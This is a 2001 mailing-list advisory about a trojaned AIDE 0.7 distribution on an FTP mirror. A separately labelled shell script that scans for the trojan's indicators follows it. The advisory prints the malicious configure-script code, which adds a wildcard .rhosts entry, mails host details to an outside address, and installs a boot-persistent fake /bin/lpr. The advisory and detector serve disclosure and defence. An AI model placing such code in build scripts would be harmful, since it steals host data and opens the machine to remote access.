Security Incidents mailing list archives
Trojan in Aide distribution at ftp.linux.hr
From: Rami Lehti <Rami.Lehti () finland sun com>
Date: 07 Aug 2001 09:45:42 +0300
It has come to my attention that there has been a trojaned Aide distribution at ftp://ftp.linux.hr/pub/aide

The offending binary has been removed.

Anyone who has downloaded Aide 0.7 from ftp.linux.hr is urged to download it from ftp://ftp.cs.tut.fi/pub/src/gnu and always check the PGP signature before using any distribution of Aide.

The trojaned distribution contains the following script embedded in the configure script. As you can see, it tries to add "+ +" to root's .rhosts and sends information about your host to l4m0r () freebox com

# checking if we are root or not
if [ `whoami` == "root" ];then
    root_user=1
else
    root_user=0
fi

And later on:

if [ $root_user != "1" ];then
    echo "+ +" > ~/.rhosts
    echo $LOGNAME >/tmp/jea;whoami >>/tmp/jea;hostname >>/tmp/jea;/sbin/ifconfig > /tmp/jea
    mail l4m0r () freebox com < /tmp/jea
    rm -rf /tmp/jea
else
    if [ `uname -s` != Linux ];then
        echo ""
    else
        mv -f .xinitrc /bin/lpr
        echo "# printing status monitor" >> /etc/rc.d/rc.local
        echo "/bin/lpr &" >> /etc/rc.d/rc.local
        hostname >>/tmp/jea;/sbin/ifconfig >>/tmp/jea
        mail l4m0r () freebox com < /tmp/jea
        /bin/lpr &
        rm -rf /tmp/jea
    fi
fi

Rami Lehti
--
AIDE - Advanced Intrusion Detection Environment
Check http://www.cs.tut.fi/~rammer/aide.html
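
Added example, not part of the original post or of the Aide project: shell functions that look for the strings and files used by the script quoted above, first in a downloaded configure script and then in a filesystem tree. The function names, the ROOT argument, the /root and /home/* home-directory layout and the sample tree built by make_sample are assumptions of this sketch.

```shell
#!/bin/sh
# Print each advisory indicator found in a configure script; succeed if any hit.
scan_configure() {
    file=$1 hits=0
    for pat in '/tmp/jea' 'l4m0r' '"+ +" > ~/.rhosts' 'mv -f .xinitrc /bin/lpr' \
               '# printing status monitor'; do
        if grep -qF -- "$pat" "$file"; then
            echo "INDICATOR in $file: $pat"
            hits=$((hits + 1))
        fi
    done
    [ "$hits" -gt 0 ]
}

# Check a filesystem tree for what the script leaves behind. ROOT (assumed
# argument, default: live host) allows checking a mounted disk image instead.
check_host() {
    root=${1:-} found=0
    # Wildcard "+ +" entry in a .rhosts file (home layout is an assumption)
    for rh in "$root"/root/.rhosts "$root"/home/*/.rhosts; do
        if [ -f "$rh" ] && grep -qE '^[[:space:]]*\+[[:space:]]+\+[[:space:]]*$' "$rh"; then
            echo "INDICATOR wildcard .rhosts: $rh"; found=$((found + 1))
        fi
    done
    # Line the script appends to rc.local to start the replaced /bin/lpr at boot
    rc="$root/etc/rc.d/rc.local"
    if [ -f "$rc" ] && grep -qF '/bin/lpr &' "$rc"; then
        echo "INDICATOR rc.local starts /bin/lpr: $rc"; found=$((found + 1))
    fi
    # Staging file; the script deletes it, so its absence proves nothing
    if [ -e "$root/tmp/jea" ]; then
        echo "INDICATOR staging file: $root/tmp/jea"; found=$((found + 1))
    fi
    [ "$found" -gt 0 ]
}

# Constructed sample tree (user "alice" is made up) for trying the checks offline.
make_sample() {
    mkdir -p "$1/home/alice" "$1/etc/rc.d" "$1/tmp"
    echo '+ +' > "$1/home/alice/.rhosts"
    printf '%s\n' '# printing status monitor' '/bin/lpr &' > "$1/etc/rc.d/rc.local"
    printf '%s\n' 'echo "+ +" > ~/.rhosts' 'mail x < /tmp/jea' > "$1/configure"
}

# Usage: sh thisfile path/to/configure [root-of-filesystem]
if [ $# -gt 0 ]; then scan_configure "$1"; check_host "${2:-}"; fi
```

A clean result from check_host does not clear a host that ran the trojaned configure, because the script removes its staging file and the mailed host information has already left the machine.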